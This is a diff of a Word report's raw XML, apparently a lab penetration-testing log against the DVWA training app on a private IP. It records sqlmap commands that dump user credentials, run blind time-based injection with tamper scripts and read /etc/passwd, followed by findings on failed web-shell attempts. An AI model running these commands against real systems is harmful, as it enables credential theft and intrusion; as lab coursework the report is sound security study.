--- a/Report/report.docx
+++ b/Report/report.docx
@@ -900,7 +900,23 @@
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -u "http://172.30.123.101/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=e249eada2eacc7ad62aa28cf3d13e251"  --batch</w:t>
+        <w:t xml:space="preserve"> -u "http://172.30.123.101/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=e249eada2eacc7ad62aa28cf3d13e251</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>"  --</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>batch</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1515,6 +1531,7 @@
         <w:t xml:space="preserve"> -T users -C </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="36"/>
@@ -1523,6 +1540,263 @@
         <w:t>user,password</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>dump</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>DAY-0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>Blind/time-based &amp; tamper testing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>Test blind SQLi and bypass techniques.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>Use time-based technique: --technique=T and --time-sec=5.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u "http://172.30.123.101/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=bc3952142b0a1e4a30ba858de767d0a4" --technique=T --time-sec=5 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>Try tamper scripts: --tamper=space2comment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Example:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u "http://172.30.123.101/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=bc3952142b0a1e4a30ba858de767d0a4" --technique=T --time-sec=5 --tamper=space2comment</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="36"/>
@@ -1530,41 +1804,5219 @@
         </w:rPr>
         <w:t xml:space="preserve"> --</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-        </w:rPr>
-        <w:t>dump</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>dbs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>--batch</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>DAY-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>Advanced exploitation scenarios</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u "http://172.30.123.101/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=bc3952142b0a1e4a30ba858de767d0a4" --technique=T --time-sec=5 --tamper=space2comment --file-read="/etc/passwd"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>DAY-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>Post-exploitation analysis &amp; impact assessment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Findings (brief, evidence)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>SQL Injection (multiple types)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Evidence: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> detected </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>boolean</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-based, time-based, error-based and UNION injection payloads (see your log: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Type: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>boolean</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>-based blind</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>time-based blind</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>error-based</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>UNION query</w:t>
+      </w:r>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Impact vector: data disclosure, auth bypass, DB integrity compromise.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>Arbitrary file read (sensitive file disclosure)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Evidence: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>--file-read="/etc/passwd"</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> returned </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>/etc/passwd</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> hex (decoded to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>root:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>x:0:0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>:root:/root:/bin/bash</w:t>
+      </w:r>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Impact vector: information disclosure (usernames, paths), can enable targeted privilege escalation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>Possible DB-level write/OUTFILE attempts (failed)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Evidence: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attempted file stager uploads via </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>LIMIT 'LINES TERMINATED BY'</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>UNION</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> methods; logs show repeated "file has not been written".</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Impact vector: code upload → remote code execution (RCE) if write succeeds; currently </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>not confirmed</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>OS Command / Web Shell attempt (failed)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Evidence: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>-shell</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> path attempted but upload failed; many 404s and warnings about no write privileges.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Impact vector: RCE if file upload or </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>other</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> vector succeeds.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>Excessive DB privileges or insecure DB configuration indicators</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Evidence: ability to read filesystem via SQL suggests functions like </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>LOAD_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>FILE(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or read-access were possible, or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> used other read methods. Also </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>secure_file_priv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> or FILE privilege may be configured insecurely.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Impact vector: data disclosure, pivot to host compromise.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>Outdated software / EOL stack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Evidence: web server reports Apache 2.2.8, PHP 5.2.4, Ubuntu 8.04 in logs — all are very old/EOL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Impact vector: many known vulnerabilities; greatly increases chance of exploit → RCE or privilege escalation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>Application misconfiguration / insecure environment (DVWA security=low)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Evidence: cookie </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
